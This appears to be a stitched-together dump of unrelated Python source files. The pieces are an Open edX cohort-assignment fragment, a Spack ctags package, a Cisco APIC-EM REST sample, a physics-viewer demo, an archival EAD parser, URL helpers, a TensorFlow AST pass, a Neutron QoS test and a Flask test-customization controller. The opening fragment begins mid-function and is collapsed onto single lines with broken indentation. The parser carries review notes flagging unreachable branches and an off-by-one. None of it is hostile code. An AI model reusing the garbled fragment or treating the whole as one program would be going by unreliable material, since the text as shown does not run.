if not assign: # Do not cache the cohort here, because in the next call assign # may be True, and we will have to assign the user a cohort. return None # Otherwise assign the user a cohort. try: with transaction.atomic(): # If learner has been pre-registered in a cohort, get that cohort. Otherwise assign to a random cohort. course_user_group = None for assignment in UnregisteredLearnerCohortAssignments.objects.filter(email=user.email, course_id=course_key): course_user_group = assignment.course_user_group unregistered_learner = assignment if course_user_group: unregistered_learner.delete() else: course_user_group = get_random_cohort(course_key) membership = CohortMembership.objects.create( user=user, course_user_group=course_user_group, ) return cache.setdefault(cache_key, membership.course_user_group) except IntegrityError as integrity_error: # An IntegrityError is raised when multiple workers attempt to # create the same row in one of the cohort model entries: # CourseCohort, CohortMembership. log.info( "HANDLING_INTEGRITY_ERROR: IntegrityError encountered for course '%s' and user '%s': %s", course_key, user.id, unicode(integrity_error) ) return get_cohort(user, course_key, assign, use_cached) def get_random_cohort(course_key): """ Helper method to get a cohort for random assignment. If there are multiple cohorts of type RANDOM in the course, one of them will be randomly selected. If there are no existing cohorts of type RANDOM in the course, one will be created. """ course = courses.get_course(course_key) cohorts = get_course_cohorts(course, assignment_type=CourseCohort.RANDOM) if cohorts: cohort = local_random().choice(cohorts) else: cohort = CourseCohort.create( cohort_name=DEFAULT_COHORT_NAME, course_id=course_key, assignment_type=CourseCohort.RANDOM ).course_user_group return cohort def migrate_cohort_settings(course): """ Migrate all the cohort settings associated with this course from modulestore to mysql. 
After that we will never touch modulestore for any cohort related settings. """ cohort_settings, created = CourseCohortsSettings.objects.get_or_create( course_id=course.id, defaults=_get_cohort_settings_from_modulestore(course) ) # Add the new and update the existing cohorts if created: # Update the manual cohorts already present in CourseUserGroup manual_cohorts = CourseUserGroup.objects.filter( course_id=course.id, group_type=CourseUserGroup.COHORT ).exclude(name__in=course.auto_cohort_groups) for cohort in manual_cohorts: CourseCohort.create(course_user_group=cohort) for group_name in course.auto_cohort_groups: CourseCohort.create(cohort_name=group_name, course_id=course.id, assignment_type=CourseCohort.RANDOM) return cohort_settings def get_course_cohorts(course, assignment_type=None): """ Get a list of all the cohorts in the given course. This will include auto cohorts, regardless of whether or not the auto cohorts include any users. Argument
s: course: the course for which cohorts should be returned assignment_type: cohort assignment type Returns: A list of CourseUserGroup objects. Empty if there are no cohorts. Does not check whether the course is cohorted. """ # Migrate cohort settings for this course migrate_cohort_settings(course)
query_set = CourseUserGroup.objects.filter( course_id=course.location.course_key, group_type=CourseUserGroup.COHORT ) query_set = query_set.filter(cohort__assignment_type=assignment_type) if assignment_type else query_set return list(query_set) def get_cohort_names(course): """Return a dict that maps cohort ids to names for the given course""" return {cohort.id: cohort.name for cohort in get_course_cohorts(course)} ### Helpers for cohort management views def get_cohort_by_name(course_key, name):
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)

from spack import *


class ExuberantCtags(AutotoolsPackage):
    """The canonical ctags generator"""

    homepage = "http://ctags.sourceforge.net"
    url = "http://downloads.sourceforge.net/project/ctags/ctags/5.8/ctags-5.8.tar.gz"

    # 5.8 is the final upstream Exuberant Ctags release.
    version('5.8', sha256='0e44b45dcabe969e0bbbb11e30c246f81abe5d32012db37395eb57d66e9e99c7')
# Getting started with APIC-EM APIs
# Follows APIC-EM Basics Learning Lab
# Basics Learning Lab Full example for Get Devices, Get Hosts, Get Policies, Get Applications

# * THIS SAMPLE APPLICATION AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY
# * OF ANY KIND BY CISCO, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
# * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR
# * PURPOSE, NONINFRINGEMENT, SATISFACTORY QUALITY OR ARISING FROM A COURSE OF
# * DEALING, LAW, USAGE, OR TRADE PRACTICE. CISCO TAKES NO RESPONSIBILITY
# * REGARDING ITS USAGE IN AN APPLICATION, AND IT IS PRESENTED ONLY AS AN
# * EXAMPLE. THE SAMPLE CODE HAS NOT BEEN THOROUGHLY TESTED AND IS PROVIDED AS AN
# * EXAMPLE ONLY, THEREFORE CISCO DOES NOT GUARANTEE OR MAKE ANY REPRESENTATIONS
# * REGARDING ITS RELIABILITY, SERVICEABILITY, OR FUNCTION. IN NO EVENT DOES
# * CISCO WARRANT THAT THE SOFTWARE IS ERROR FREE OR THAT CUSTOMER WILL BE ABLE
# * TO OPERATE THE SOFTWARE WITHOUT PROBLEMS OR INTERRUPTIONS. NOR DOES CISCO
# * WARRANT THAT THE SOFTWARE OR ANY EQUIPMENT ON WHICH THE SOFTWARE IS USED WILL
# * BE FREE OF VULNERABILITY TO INTRUSION OR ATTACK. THIS SAMPLE APPLICATION IS
# * NOT SUPPORTED BY CISCO IN ANY MANNER. CISCO DOES NOT ASSUME ANY LIABILITY
# * ARISING FROM THE USE OF THE APPLICATION. FURTHERMORE, IN NO EVENT SHALL CISCO
# * OR ITS SUPPLIERS BE LIABLE FOR ANY INCIDENTAL OR CONSEQUENTIAL DAMAGES, LOST
# * PROFITS, OR LOST DATA, OR ANY OTHER INDIRECT DAMAGES EVEN IF CISCO OR ITS
# * SUPPLIERS HAVE BEEN INFORMED OF THE POSSIBILITY THEREOF.-->

# import the requests library so we can use it to make REST calls
# (http://docs.python-requests.org/en/latest/index.html)
import requests

# import the json library. This library provides handy features for formatting,
# displaying and manipulating json.
import json

# All of our REST calls will use the url for the APIC EM Controller as the base URL
# So lets define a variable for the controller IP or DNS so we don't have to keep typing it
controller_url = "http://sandboxapic.cisco.com/"


def fetch_and_print(resource, header, field):
    """GET a collection from the APIC-EM controller and print one field per item.

    The original sample repeated the same GET / parse / print sequence four
    times (with stale copy-pasted comments); this helper factors it out.

    :param resource: API path relative to the controller URL, e.g. 'api/v0/host'
    :param header: heading line printed before the items
    :param field: key printed from each element of the JSON 'response' array
    """
    url = controller_url + resource
    response = requests.get(url)
    # Fail with a clear HTTP error instead of a confusing JSON decode error
    # when the controller returns a non-2xx status.
    response.raise_for_status()
    # The controller wraps every payload in a top-level "response" array.
    items = response.json()["response"]
    print(header)
    for item in items:
        print(item[field])


# Get Devices: view a list of all the devices in the network (routers and switches).
fetch_and_print('api/v0/network-device', "Devices = ", "id")

# Get Hosts: view a list of all the hosts in the network.
fetch_and_print('api/v0/host', "Hosts= ", "hostIp")

# Get Policies: view a list of all the policies in the network.
fetch_and_print('api/v0/policy', "Policies= ", "id")

# Get Applications: view a list of all the applications in the network.
fetch_and_print('api/v0/application', "Applications= ", "name")
#!/usr/bin/env python

import click
import logging
import os
import pagoda
import pagoda.viewer


def full(name):
    """Resolve *name* relative to this script's directory, so the demo can be
    launched from any working directory."""
    return os.path.join(os.path.dirname(__file__), name)


@click.command()
def main():
    # No docstring on purpose: click would surface it as --help text.
    logging.basicConfig()
    # 120 Hz physics timestep; `1.` keeps the division float under Python 2.
    w = pagoda.cooper.World(dt=1. / 120)
    # Skeleton and marker files live one directory up; the motion capture
    # data (.c3d) sits next to this script.
    w.load_skeleton(full('../optimized-skeleton.txt'))
    w.load_markers(full('cooper-motion.c3d'),
                   full('../optimized-markers.txt'))
    # Blocks until the viewer window is closed.
    pagoda.viewer.Viewer(w).run()


if __name__ == '__main__':
    main()
# module for the Container List <dsc>
import xml.etree.cElementTree as ET
from components import components
import globals
import wx
from messages import error
from mixed_content import mixed_content


def dsc(dsc_root, FASheet, version):
    """Read an EAD <dsc> (container list) element into the FASheet tree.

    Detects which component-numbering convention the finding aid uses
    (unnumbered nested <c> tags, numbered <c01>..<c12> tags, or no series
    at all), fills in the CollectionMap entries for each series/subseries,
    and delegates per-series processing to components().

    :param dsc_root: the parsed <dsc> Element of the EAD file
    :param FASheet: the spreadsheet-model Element tree being populated
    :param version: EAD version indicator, passed through to components()
    """
    from wx.lib.pubsub import pub
    # Progress message for the GUI thread.
    wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading <dsc>...")
    # Decide the tag convention by probing the first two nesting levels.
    if dsc_root.find('c/c') is None:
        if dsc_root.find('c01/c02') is None:
            number = "noseries"
        else:
            number = "c01"
    else:
        number = "c"
    """
    for top_series in dsc_root:
        if top_series.find('did/unittitle') is None:
            wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading series...")
        else:
            wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading " + top_series.find('did/unittitle').text + "...")
    """
    if number == "c":
        child_tag = "c"
        cmpnt_count = 0
        # NOTE(review): iterfind() returns an iterator and is never None, so
        # this "no series" branch is unreachable and the else-branch always
        # runs. find('c/c') was probably intended — confirm.
        if dsc_root.iterfind('c/c') is None:
            # Collection does not have series
            FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
            cmpnt_count = cmpnt_count + 1
            level = "1"
            components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
        else:
            # Collection has series
            FASheet.find('CollectionSheet/CollectionMap').clear()
            for component in dsc_root.iter('c'):
                # Only <c> elements that themselves contain a <c> child are
                # series/subseries; leaf items are handled inside components().
                if component.find('c') is None:
                    pass
                else:
                    cmpnt_count = cmpnt_count + 1
                    # Build this series' CollectionMap entry.
                    Component_element = ET.Element('Component')
                    FASheet.find('CollectionSheet/CollectionMap').append(Component_element)
                    ComponentLevel_element = ET.Element('ComponentLevel')
                    Component_element.append(ComponentLevel_element)
                    ComponentNumber_element = ET.Element('ComponentNumber')
                    Component_element.append(ComponentNumber_element)
                    ComponentName_element = ET.Element('ComponentName')
                    Component_element.append(ComponentName_element)
                    # Determine nesting depth by membership in each path depth.
                    # NOTE(review): the 'c/c/c' path is tested twice (levels 3
                    # and 4), so level "4" can never be assigned and every
                    # deeper test is shifted by one (level "5" matches a
                    # depth-4 path, etc.). Looks like an off-by-one; compare
                    # the c01 branch below, which maps cNN directly to N.
                    if component in dsc_root.iterfind('c'):
                        level = "1"
                    elif component in dsc_root.iterfind('c/c'):
                        level = "2"
                    elif component in dsc_root.iterfind('c/c/c'):
                        level = "3"
                    elif component in dsc_root.iterfind('c/c/c'):
                        level = "4"
                    elif component in dsc_root.iterfind('c/c/c/c'):
                        level = "5"
                    elif component in dsc_root.iterfind('c/c/c/c/c'):
                        level = "6"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c'):
                        level = "7"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c'):
                        level = "8"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c'):
                        level = "9"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c'):
                        level = "10"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c'):
                        level = "11"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c/c'):
                        level = "12"
                    ComponentLevel_element.text = level
                    if component.find('did') is None:
                        pass
                    else:
                        # Prefer <unitid> for the component number; fall back
                        # to an id attribute on <c>, then on <did>.
                        if component.find('did/unitid') is None:
                            if "id" in component.attrib:
                                ComponentNumber_element.text = component.attrib['id']
                            elif "id" in component.find('did').attrib:
                                ComponentNumber_element.text = component.find('did').attrib['id']
                        else:
                            ComponentNumber_element.text = mixed_content(component.find('did/unitid'))
                        if component.find('did/unittitle') is None:
                            pass
                        else:
                            ComponentName_element.text = mixed_content(component.find('did/unittitle'))
                    # The sheet model only has Series1..Series50: warn once at
                    # the 51st series/subseries, silently skip any beyond it.
                    if cmpnt_count > 51:
                        pass
                    elif cmpnt_count == 51:
                        error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False)
                    else:
                        components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
    elif number == "c01":
        cmpnt_count = 0
        # NOTE(review): iter() returns an iterator and is never None, so this
        # "no series" branch is unreachable; if it ever ran, child_tag would
        # be unbound here (NameError). find('c01/c02') was probably intended.
        if dsc_root.iter('c02') is None:
            # Collection does not have series
            FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
            cmpnt_count = cmpnt_count + 1
            level = "1"
            components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
        else:
            # Collection has series
            FASheet.find('CollectionSheet/CollectionMap').clear()
            for component in dsc_root.iter():
                if component.tag == 'c01' or component.tag == 'c02' or component.tag == 'c03' or component.tag == 'c04' or component.tag == 'c05' or component.tag == 'c06' or component.tag == 'c07' or component.tag == 'c08' or component.tag == 'c09' or component.tag == 'c10' or component.tag == 'c11' or component.tag == 'c12':
                    # A cNN component holds its children as c(NN+1) tags.
                    child_tag_name = component.tag[1:]
                    if int(child_tag_name) < 10:
                        child_tag = "c0" + str(int(child_tag_name) + 1)
                    else:
                        child_tag = "c" + str(int(child_tag_name) + 1)
                    # Only components with children count as series/subseries.
                    if component.find(child_tag) is None:
                        pass
                    else:
                        cmpnt_count = cmpnt_count + 1
                        Component_element = ET.Element('Component')
                        FASheet.find('CollectionSheet/CollectionMap').append(Component_element)
                        ComponentLevel_element = ET.Element('ComponentLevel')
                        Component_element.append(ComponentLevel_element)
                        ComponentNumber_element = ET.Element('ComponentNumber')
                        Component_element.append(ComponentNumber_element)
                        ComponentName_element = ET.Element('ComponentName')
                        Component_element.append(ComponentName_element)
                        # Depth is encoded directly in the numbered tag name.
                        level = "0"
                        if component.tag == 'c01':
                            level = "1"
                        elif component.tag == 'c02':
                            level = "2"
                        elif component.tag == 'c03':
                            level = "3"
                        elif component.tag == 'c04':
                            level = "4"
                        elif component.tag == 'c05':
                            level = "5"
                        elif component.tag == 'c06':
                            level = "6"
                        elif component.tag == 'c07':
                            level = "7"
                        elif component.tag == 'c08':
                            level = "8"
                        elif component.tag == 'c09':
                            level = "9"
                        elif component.tag == 'c10':
                            level = "10"
                        elif component.tag == 'c11':
                            level = "11"
                        elif component.tag == 'c12':
                            level = "12"
                        ComponentLevel_element.text = level
                        if component.find('did') is None:
                            pass
                        else:
                            # Same number/title fallback chain as the <c> branch.
                            if component.find('did/unitid') is None:
                                if "id" in component.attrib:
                                    ComponentNumber_element.text = component.attrib['id']
                                elif "id" in component.find('did').attrib:
                                    ComponentNumber_element.text = component.find('did').attrib['id']
                            else:
                                ComponentNumber_element.text = mixed_content(component.find('did/unitid'))
                            if component.find('did/unittitle') is None:
                                pass
                            else:
                                ComponentName_element.text = mixed_content(component.find('did/unittitle'))
                        # Warn at the 51st series, ignore any beyond it.
                        if cmpnt_count > 51:
                            pass
                        elif cmpnt_count == 51:
                            error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False)
                        else:
                            components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
    elif number == "noseries":
        cmpnt_count = 0
        # Collection does not have series: treat the whole <dsc> as Series1.
        FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
        cmpnt_count = 1
        level = "1"
        components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, "c", version)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of overview archive.
# Copyright © 2015 seamus tuohy, <stuohy@internews.org>
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the included LICENSE file for details.

# identification
from os import path
from os.path import abspath
from urllib.parse import urlparse
from urllib.request import urlopen
from urllib.error import HTTPError, URLError

# logging
import logging
log = logging.getLogger("oa.{0}".format(__name__))


def filetype(file_path):
    """Return the MIME type of the file at *file_path* (via libmagic).

    :param file_path: path to an existing regular file
    :raises IOError: if the path does not point at a readable regular file
    """
    # Imported lazily so the URL helpers below stay usable when the
    # third-party `magic` package is not installed.
    import magic
    if path.exists(file_path) and path.isfile(file_path):
        try:
            file_type = magic.from_file(abspath(file_path), mime=True)
        except IOError:
            log.error("{0} is not a valid file".format(file_path))
            raise IOError("{0} is not a valid file".format(file_path))
    else:
        log.error("{0} is not a valid path to a file".format(file_path))
        raise IOError("{0} is not a valid path to a file".format(file_path))
    log.debug("filetype for {0} identified as {1}".format(file_path, file_type))
    return file_type


def is_url(link):
    """Return True if *link* can actually be fetched, False otherwise.

    Fixes over the original:
    - the opened connection is now closed (the original leaked the socket);
    - URLError is caught as well (HTTPError is its subclass), so unreachable
      hosts and unsupported schemes return False instead of raising;
    - the unreachable trailing ``return False`` was removed.
    """
    try:
        # Context manager closes the response/socket on both paths.
        with urlopen(link):
            return True
    except (ValueError, URLError):
        # ValueError: malformed URL; URLError: network/protocol failure.
        return False


def is_archive(link):
    """Return True if *link* points at the Internet Archive's Wayback
    Machine (host web.archive.org)."""
    try:
        parsed_url = urlparse(link)
        if parsed_url.netloc == 'web.archive.org':
            return True
    except ValueError:
        return False
    return False
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Live value resolution.

Live values are extracted from the known execution context.

Requires activity analysis annotations.
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import gast

from tensorflow.contrib.py2tf.pyct import anno
from tensorflow.contrib.py2tf.pyct import transformer
from tensorflow.contrib.py2tf.pyct.static_analysis.annos import NodeAnno


class LiveValueResolver(transformer.Base):
  """Annotates nodes with live values."""

  def __init__(self, context, literals):
    super(LiveValueResolver, self).__init__(context)
    # Mapping of symbol name -> literal value; consulted before the
    # execution namespace in visit_Name.
    self.literals = literals

  def visit_ClassDef(self, node):
    self.generic_visit(node)
    # A class defined in the converted code must be visible in the
    # surrounding namespace; annotate the node with the class object itself.
    anno.setanno(node, 'live_val', self.context.namespace[node.name])
    return node

  def visit_Name(self, node):
    self.generic_visit(node)
    if isinstance(node.ctx, gast.Load):
      # Activity analysis must have run before this pass; these annotations
      # are its output.
      assert anno.hasanno(node, NodeAnno.IS_LOCAL), node
      symbol_is_local = anno.getanno(node, NodeAnno.IS_LOCAL)
      assert anno.hasanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY), node
      symbol_is_modified = anno.getanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY)
      assert anno.hasanno(node, NodeAnno.IS_PARAM), node
      symbol_is_param = anno.getanno(node, NodeAnno.IS_PARAM)
      # Only non-local, non-parameter symbols can be resolved from the
      # enclosing context: first literals, then the namespace.
      if not symbol_is_local and not symbol_is_param:
        if node.id in self.literals:
          anno.setanno(node, 'live_val', self.literals[node.id])
        elif node.id in self.context.namespace:
          obj = self.context.namespace[node.id]
          anno.setanno(node, 'live_val', obj)
          if hasattr(obj, '__name__'):
            # If the symbol value is for example a primitive, then it will not
            # have a name.
            anno.setanno(node, 'fqn', (obj.__name__,))
        else:
          pass
          # TODO(mdan): Should we raise an error here?
          # Can encounter this when:
          #  * a symbol truly lacks reference
          #  * a symbol is new, like the new name of a function we just renamed.
      else:
        pass
        # TODO(mdan): Attempt to trace its value through the local chain.
        # TODO(mdan): Use type annotations as fallback.
      # Unmodified symbols may additionally be resolved from the call-time
      # argument values, when those are known.
      if not symbol_is_modified:
        if node.id in self.context.arg_values:
          obj = self.context.arg_values[node.id]
          anno.setanno(node, 'live_val', obj)
          anno.setanno(node, 'fqn', (obj.__class__.__name__,))
    return node

  def visit_Attribute(self, node):
    self.generic_visit(node)
    if anno.hasanno(node.value, 'live_val'):
      # The object being accessed is itself resolved: resolve the attribute
      # by plain getattr and extend the fully-qualified name.
      assert anno.hasanno(node.value, 'fqn')
      parent_object = anno.getanno(node.value, 'live_val')
      if not hasattr(parent_object, node.attr):
        raise AttributeError('%s has no attribute %s' % (parent_object, node.attr))
      anno.setanno(node, 'parent_type', type(parent_object))
      anno.setanno(node, 'live_val', getattr(parent_object, node.attr))
      anno.setanno(node, 'fqn', anno.getanno(node.value, 'fqn') + (node.attr,))
    # TODO(mdan): Investigate the role built-in annotations can play here.
    elif anno.hasanno(node.value, 'type'):
      # Only the static type of the parent is known; resolve via the type.
      parent_type = anno.getanno(node.value, 'type')
      if hasattr(parent_type, node.attr):
        # This should hold for static members like methods.
        # This would not hold for dynamic members like function attributes.
        # For the dynamic case, we simply leave the node without an annotation,
        # and let downstream consumers figure out what to do.
        anno.setanno(node, 'parent_type', parent_type)
        anno.setanno(node, 'live_val', getattr(parent_type, node.attr))
        anno.setanno(node, 'fqn', anno.getanno(node.value, 'type_fqn') + (node.attr,))
    elif isinstance(node.value, gast.Name):
      stem_name = node.value
      # All nonlocal symbols should be fully resolved.
      assert anno.hasanno(stem_name, NodeAnno.IS_LOCAL), stem_name
      # TODO(mdan): Figure out what to do when calling attribute on local object
      # Maybe just leave as-is?
    return node


def resolve(node, context, literals):
  """Run LiveValueResolver over *node* and return the annotated AST."""
  return LiveValueResolver(context, literals).visit(node)
# Copyright 2015 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import mock
from oslo_utils import uuidutils

from neutron import context
from neutron.objects.qos import policy
from neutron.objects.qos import rule
from neutron.plugins.ml2.drivers.mech_sriov.agent.common import exceptions
from neutron.plugins.ml2.drivers.mech_sriov.agent.extension_drivers import (
    qos_driver)
from neutron.tests import base


class QosSRIOVAgentDriverTestCase(base.BaseTestCase):
    """Unit tests for the SR-IOV agent QoS extension driver.

    The eswitch manager is replaced by a mock so no real SR-IOV hardware
    is touched; the tests assert on the set_device_max_rate calls made by
    the driver.
    """

    # Fixed fixture values shared by every test.
    ASSIGNED_MAC = '00:00:00:00:00:66'
    PCI_SLOT = '0000:06:00.1'

    def setUp(self):
        super(QosSRIOVAgentDriverTestCase, self).setUp()
        self.context = context.get_admin_context()
        self.qos_driver = qos_driver.QosSRIOVAgentDriver()
        self.qos_driver.initialize()
        # Stub out the eswitch manager and keep a handle on the max-rate
        # mock so the tests can assert against it directly.
        self.qos_driver.eswitch_mgr = mock.Mock()
        self.qos_driver.eswitch_mgr.set_device_max_rate = mock.Mock()
        self.max_rate_mock = self.qos_driver.eswitch_mgr.set_device_max_rate
        self.rule = self._create_bw_limit_rule_obj()
        self.qos_policy = self._create_qos_policy_obj([self.rule])
        self.port = self._create_fake_port()

    def _create_bw_limit_rule_obj(self):
        # Bandwidth-limit rule with arbitrary but fixed limits.
        rule_obj = rule.QosBandwidthLimitRule()
        rule_obj.id = uuidutils.generate_uuid()
        rule_obj.max_kbps = 2
        rule_obj.max_burst_kbps = 200
        rule_obj.obj_reset_changes()
        return rule_obj

    def _create_qos_policy_obj(self, rules):
        # Minimal policy object wrapping the given rule list.
        policy_dict = {'id': uuidutils.generate_uuid(),
                       'tenant_id': uuidutils.generate_uuid(),
                       'name': 'test',
                       'description': 'test',
                       'shared': False,
                       'rules': rules}
        policy_obj = policy.QosPolicy(self.context, **policy_dict)
        policy_obj.obj_reset_changes()
        return policy_obj

    def _create_fake_port(self):
        # Port dict in the shape the agent extension receives.
        return {'port_id': uuidutils.generate_uuid(),
                'profile': {'pci_slot': self.PCI_SLOT},
                'device': self.ASSIGNED_MAC}

    def test_create_rule(self):
        # create() must push the rule's max_kbps down to the VF.
        self.qos_driver.create(self.port, self.qos_policy)
        self.max_rate_mock.assert_called_once_with(
            self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps)

    def test_update_rule(self):
        # update() behaves like create() for a bandwidth-limit rule.
        self.qos_driver.update(self.port, self.qos_policy)
        self.max_rate_mock.assert_called_once_with(
            self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps)

    def test_delete_rules(self):
        # delete() resets the VF rate limit to 0 (unlimited).
        self.qos_driver.delete(self.port, self.qos_policy)
        self.max_rate_mock.assert_called_once_with(
            self.ASSIGNED_MAC, self.PCI_SLOT, 0)

    def test__set_vf_max_rate_captures_sriov_failure(self):
        # An eswitch failure must be swallowed, not propagated.
        self.max_rate_mock.side_effect = exceptions.SriovNicError()
        self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT)

    def test__set_vf_max_rate_unknown_device(self):
        # No rate call should be made for a device the eswitch doesn't know.
        with mock.patch.object(self.qos_driver.eswitch_mgr, 'device_exists',
                               return_value=False):
            self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT)
        self.assertFalse(self.max_rate_mock.called)
"""
mod_customized Controllers
===================

In this module, users can test their fork branch with customized set of regression tests
"""

from flask import Blueprint, g, request, redirect, url_for, flash
from github import GitHub, ApiError
from datetime import datetime, timedelta
from decorators import template_renderer, get_menu_entries
from mod_auth.controllers import login_required, check_access_rights
from mod_auth.models import Role, User
from mod_test.models import Fork, Test, TestType, TestPlatform
from mod_customized.forms import TestForkForm
from mod_customized.models import TestFork, CustomizedTest
from mod_regression.models import Category, regressionTestLinkTable, RegressionTest
from mod_test.controllers import get_data_for_test, TestNotFoundException
from mod_auth.controllers import fetch_username_from_token
from sqlalchemy import and_

mod_customized = Blueprint('custom', __name__)


@mod_customized.before_app_request
def before_app_request():
    # Expose the "Customize Test" menu entry to logged-in users only.
    if g.user is not None:
        g.menu_entries['custom'] = {
            'title': 'Customize Test',
            'icon': 'code-fork',
            'route': 'custom.index',
            'access': [Role.tester, Role.contributor, Role.admin]
        }


@mod_customized.route('/', methods=['GET', 'POST'])
@login_required
@check_access_rights([Role.tester, Role.contributor, Role.admin])
@template_renderer()
def index():
    """
    Display a form to allow users to run tests.
    User can enter commit or select the commit from their repo that are not more than 30 days old.
    User can customized test based on selected regression tests and platforms.
    Also Display list of customized tests started by user.
    User will be redirected to the same page on submit.
    """
    fork_test_form = TestForkForm(request.form)
    username = fetch_username_from_token()
    commit_options = False
    if username is not None:
        # Query the user's fork of the project through the bot account.
        gh = GitHub(access_token=g.github['bot_token'])
        repository = gh.repos(username)(g.github['repository'])
        # Only commits since last month
        last_month = datetime.now() - timedelta(days=30)
        commit_since = last_month.isoformat() + 'Z'
        commits = repository.commits().get(since=commit_since)
        commit_arr = []
        for commit in commits:
            # Each dropdown choice renders as a link to the commit on GitHub.
            commit_url = commit['html_url']
            commit_sha = commit['sha']
            commit_option = (
                '<a href="{url}">{sha}</a>').format(url=commit_url, sha=commit_sha)
            commit_arr.append((commit_sha, commit_option))
        # If there are commits present, display it on webpage
        if len(commit_arr) > 0:
            fork_test_form.commit_select.choices = commit_arr
            commit_options = True
    fork_test_form.regression_test.choices = [
        (regression_test.id, regression_test) for regression_test in RegressionTest.query.all()]
    if fork_test_form.add.data and fork_test_form.validate_on_submit():
        # Imported here to keep the (heavyweight) HTTP client off the
        # module import path for plain GET requests.
        import requests
        regression_tests = fork_test_form.regression_test.data
        commit_hash = fork_test_form.commit_hash.data
        repo = g.github['repository']
        platforms = fork_test_form.platform.data
        api_url = ('https://api.github.com/repos/{user}/{repo}/commits/{hash}').format(
            user=username, repo=repo, hash=commit_hash
        )
        # Show error if github fails to recognize commit
        response = requests.get(api_url)
        if response.status_code == 500:
            fork_test_form.commit_hash.errors.append('Error contacting Github')
        elif response.status_code != 200:
            fork_test_form.commit_hash.errors.append('Wrong Commit Hash')
        else:
            add_test_to_kvm(username, commit_hash, platforms, regression_tests)
            return redirect(url_for('custom.index'))
    # Only offer categories that actually contain regression tests.
    populated_categories = g.db.query(regressionTestLinkTable.c.category_id).subquery()
    categories = Category.query.filter(Category.id.in_(populated_categories)).order_by(Category.name.asc()).all()
    # The 50 most recent tests started by the current user.
    tests = Test.query.filter(and_(TestFork.user_id == g.user.id, TestFork.test_id == Test.id)).order_by(
        Test.id.desc()).limit(50).all()
    return {
        'addTestFork': fork_test_form,
        'commit_options': commit_options,
        'tests': tests,
        'TestType': TestType,
        'GitUser': username,
        'categories': categories,
        'customize': True
    }


def add_test_to_kvm(username, commit_hash, platforms, regression_tests):
    """
    Create new tests and add it to CustomizedTests based on parameters.

    :param username: git username required to find fork
    :type username: str
    :param commit_hash: commit hash of the repo user selected to run test
    :type commit_hash: str
    :param platforms: platforms user selected to run test
    :type platforms: list
    :param regression_tests: regression tests user selected to run tests
    :type regression_tests: list
    """
    fork_url = ('https://github.com/{user}/{repo}.git').format(
        user=username, repo=g.github['repository']
    )
    # Reuse the Fork row if this fork was tested before.
    fork = Fork.query.filter(Fork.github == fork_url).first()
    if fork is None:
        fork = Fork(fork_url)
        g.db.add(fork)
        g.db.commit()
    # One Test row per selected platform, each linked to the selected
    # regression tests and to the requesting user.
    for platform in platforms:
        platform = TestPlatform.from_string(platform)
        test = Test(platform, TestType.commit, fork.id, 'master', commit_hash)
        g.db.add(test)
        g.db.commit()
        for regression_test in regression_tests:
            customized_test = CustomizedTest(test.id, regression_test)
            g.db.add(customized_test)
        test_fork = TestFork(g.user.id, test.id)
        g.db.add(test_fork)
        g.db.commit()
#!/usr/bin/python

# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
